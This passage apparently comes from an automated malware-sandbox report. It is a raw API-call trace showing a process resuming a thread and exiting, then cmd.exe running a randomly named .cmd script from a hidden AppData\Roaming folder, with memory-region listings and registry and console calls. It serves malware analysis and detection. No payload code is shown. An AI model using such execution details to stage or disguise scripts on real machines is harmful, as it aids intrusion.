[62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0115.165] ResumeThread (hThread=0x48) returned 0x1 [0115.165] CloseHandle (hObject=0x48) returned 1 [0115.165] CloseHandle (hObject=0x4c) returned 1 [0115.165] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0115.166] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0115.166] ExitProcess (uExitCode=0x0) Process: id = "47" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16740" os_pid = "0xdc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0xd80" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7513 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7514 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7515 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7516 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 7517 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 7518 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7519 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7520 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 7521 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 7522 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8022 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8023 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8024 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8025 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 8026 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 8027 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 8028 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8029 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8030 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8031 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8032 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8033 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8034 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8035 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8036 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 8037 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8038 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8039 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 8040 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 8041 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 8042 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 8043 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 8044 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 8045 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Region: id = 8046 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8047 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8048 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8049 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 8050 start_va = 0x1390000 end_va = 0x165efff entry_point = 0x1390000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 77 os_tid = 0xdc8 [0115.755] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afab4 | out: lpSystemTimeAsFileTime=0x2afab4*(dwLowDateTime=0x825bec20, dwHighDateTime=0x1d440a9)) [0115.755] GetCurrentProcessId () returned 0xdc4 [0115.755] GetCurrentThreadId () returned 0xdc8 [0115.755] GetTickCount () returned 0x2778f [0115.755] QueryPerformanceCounter (in: lpPerformanceCount=0x2afaac | out: lpPerformanceCount=0x2afaac*=17254440793) returned 1 [0115.756] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0115.756] __set_app_type (_Type=0x1) [0115.756] __p__fmode () returned 0x76b331f4 [0115.756] __p__commode () returned 0x76b331fc [0115.756] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0115.756] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0115.756] GetCurrentThreadId () returned 0xdc8 [0115.756] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xdc8) returned 0x38 [0115.756] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0115.756] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0115.756] SetThreadUILanguage (LangId=0x0) returned 0x409 [0115.758] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0115.758] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afa44 | out: phkResult=0x2afa44*=0x0) returned 0x2 [0115.758] VirtualQuery (in: lpAddress=0x2afa7b, lpBuffer=0x2afa14, dwLength=0x1c | out: lpBuffer=0x2afa14*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0115.759] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afa14, dwLength=0x1c | out: lpBuffer=0x2afa14*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0115.759] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afa14, dwLength=0x1c | out: lpBuffer=0x2afa14*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0115.759] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afa14, dwLength=0x1c | out: lpBuffer=0x2afa14*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0115.759] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afa14, dwLength=0x1c | out: lpBuffer=0x2afa14*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0115.759] GetConsoleOutputCP () returned 0x1b5 [0115.759] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0115.759] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0115.759] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.759] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0115.759] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.759] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0115.759] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.759] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0115.759] _get_osfhandle (_FileHandle=0) returned 0x3 [0115.759] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0115.760] _get_osfhandle (_FileHandle=0) returned 0x3 [0115.760] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0115.760] GetEnvironmentStringsW () returned 0x420150* [0115.760] FreeEnvironmentStringsW (penv=0x420150) returned 1 [0115.760] GetEnvironmentStringsW () returned 0x420150* [0115.760] FreeEnvironmentStringsW (penv=0x420150) returned 1 [0115.760] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae9b4 | out: phkResult=0x2ae9b4*=0x40) returned 0x0 [0115.760] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x0, lpData=0x2ae9c0*=0x0, lpcbData=0x2ae9b8*=0x1000) returned 0x2 [0115.760] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x4, lpData=0x2ae9c0*=0x1, lpcbData=0x2ae9b8*=0x4) returned 0x0 [0115.760] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x0, lpData=0x2ae9c0*=0x1, lpcbData=0x2ae9b8*=0x1000) returned 0x2 [0115.760] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x4, lpData=0x2ae9c0*=0x0, lpcbData=0x2ae9b8*=0x4) returned 0x0 [0115.760] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x4, lpData=0x2ae9c0*=0x40, lpcbData=0x2ae9b8*=0x4) returned 0x0 [0115.760] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x4, lpData=0x2ae9c0*=0x40, lpcbData=0x2ae9b8*=0x4) returned 0x0 [0115.760] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x0, lpData=0x2ae9c0*=0x40, lpcbData=0x2ae9b8*=0x1000) returned 0x2 [0115.760] RegCloseKey (hKey=0x40) returned 0x0 [0115.761] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae9b4 | out: phkResult=0x2ae9b4*=0x40) returned 0x0 [0115.761] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x0, lpData=0x2ae9c0*=0x40, lpcbData=0x2ae9b8*=0x1000) returned 0x2 [0115.761] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x4, lpData=0x2ae9c0*=0x1, lpcbData=0x2ae9b8*=0x4) returned 0x0 [0115.761] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x0, lpData=0x2ae9c0*=0x1, lpcbData=0x2ae9b8*=0x1000) returned 0x2 [0115.761] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x4, lpData=0x2ae9c0*=0x0, lpcbData=0x2ae9b8*=0x4) returned 0x0 [0115.761] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x4, lpData=0x2ae9c0*=0x9, lpcbData=0x2ae9b8*=0x4) returned 0x0 [0115.761] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x4, lpData=0x2ae9c0*=0x9, lpcbData=0x2ae9b8*=0x4) returned 0x0 [0115.761] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae9bc, lpData=0x2ae9c0, lpcbData=0x2ae9b8*=0x1000 | out: lpType=0x2ae9bc*=0x0, lpData=0x2ae9c0*=0x9, lpcbData=0x2ae9b8*=0x1000) returned 0x2 [0115.761] RegCloseKey (hKey=0x40) returned 0x0 [0115.761] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88635c [0115.761] srand (_Seed=0x5b88635c) [0115.761] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd\"" [0115.761] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd\"" [0115.761] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0115.761] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4219b8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0115.762] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0115.762] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0115.762] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0115.762] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0115.762] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0115.762] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0115.762] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0115.762] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0115.762] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0115.762] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0115.762] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0115.762] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0115.762] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0115.762] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af780 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0115.762] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af780, lpFilePart=0x2af77c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af77c*="Desktop") returned 0x18 [0115.762] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0115.762] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af4fc | out: lpFindFileData=0x2af4fc) returned 0x41ffe0 [0115.762] FindClose (in: hFindFile=0x41ffe0 | out: hFindFile=0x41ffe0) returned 1 [0115.762] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af4fc | out: lpFindFileData=0x2af4fc) returned 0x41ffe0 [0115.763] FindClose (in: hFindFile=0x41ffe0 | out: hFindFile=0x41ffe0) returned 1 [0115.763] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af4fc | out: lpFindFileData=0x2af4fc) returned 0x41ffe0 [0115.763] FindClose (in: hFindFile=0x41ffe0 | out: hFindFile=0x41ffe0) returned 1 [0115.763] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0115.763] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 